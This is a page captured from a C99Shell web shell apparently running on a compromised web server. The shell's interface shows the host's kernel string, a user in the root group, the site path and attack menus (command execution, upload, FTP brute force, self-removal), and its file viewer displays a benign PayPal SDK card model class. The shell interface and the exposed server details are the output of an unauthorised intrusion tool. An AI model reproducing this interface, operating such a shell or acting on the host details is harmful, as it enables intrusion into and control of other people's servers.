!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/sms.picotech.app/public_html/vendor/paypal/rest-api-sdk-php/lib/PayPal/Api/   drwxr-xr-x
Free 28.61 GB of 117.98 GB (24.25%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     PrivateLabelCard.php (3.04 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace PayPal\Api;

use 
PayPal\Common\PayPalModel;

/**
 * Class PrivateLabelCard
 *
 * A resource representing a type of merchant branded payment card. To promote customer value (convenience and earning rewards) and retailer value (merchants drive business using the store cards), PayPal will support as payment method.
 *
 * @package PayPal\Api
 *
 * @property string id
 * @property string card_number
 * @property string issuer_id
 * @property string issuer_name
 * @property string image_key
 */
class PrivateLabelCard extends PayPalModel
{
    
/**
     * encrypted identifier of the private label card instrument.
     *
     * @param string $id
     * 
     * @return $this
     */
    
public function setId($id)
    {
        
$this->id $id;
        return 
$this;
    }

    
/**
     * encrypted identifier of the private label card instrument.
     *
     * @return string
     */
    
public function getId()
    {
        return 
$this->id;
    }

    
/**
     * last 4 digits of the card number.
     *
     * @param string $card_number
     * 
     * @return $this
     */
    
public function setCardNumber($card_number)
    {
        
$this->card_number $card_number;
        return 
$this;
    }

    
/**
     * last 4 digits of the card number.
     *
     * @return string
     */
    
public function getCardNumber()
    {
        return 
$this->card_number;
    }

    
/**
     * Merchants providing private label store cards have associated issuer account. This value indicates encrypted account number of the associated issuer account.
     *
     * @param string $issuer_id
     * 
     * @return $this
     */
    
public function setIssuerId($issuer_id)
    {
        
$this->issuer_id $issuer_id;
        return 
$this;
    }

    
/**
     * Merchants providing private label store cards have associated issuer account. This value indicates encrypted account number of the associated issuer account.
     *
     * @return string
     */
    
public function getIssuerId()
    {
        return 
$this->issuer_id;
    }

    
/**
     * Merchants providing private label store cards have associated issuer account. This value indicates name on the issuer account.
     *
     * @param string $issuer_name
     * 
     * @return $this
     */
    
public function setIssuerName($issuer_name)
    {
        
$this->issuer_name $issuer_name;
        return 
$this;
    }

    
/**
     * Merchants providing private label store cards have associated issuer account. This value indicates name on the issuer account.
     *
     * @return string
     */
    
public function getIssuerName()
    {
        return 
$this->issuer_name;
    }

    
/**
     * This value indicates URL to access PLCC program logo image
     *
     * @param string $image_key
     * 
     * @return $this
     */
    
public function setImageKey($image_key)
    {
        
$this->image_key $image_key;
        return 
$this;
    }

    
/**
     * This value indicates URL to access PLCC program logo image
     *
     * @return string
     */
    
public function getImageKey()
    {
        return 
$this->image_key;
    }

}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.004 ]--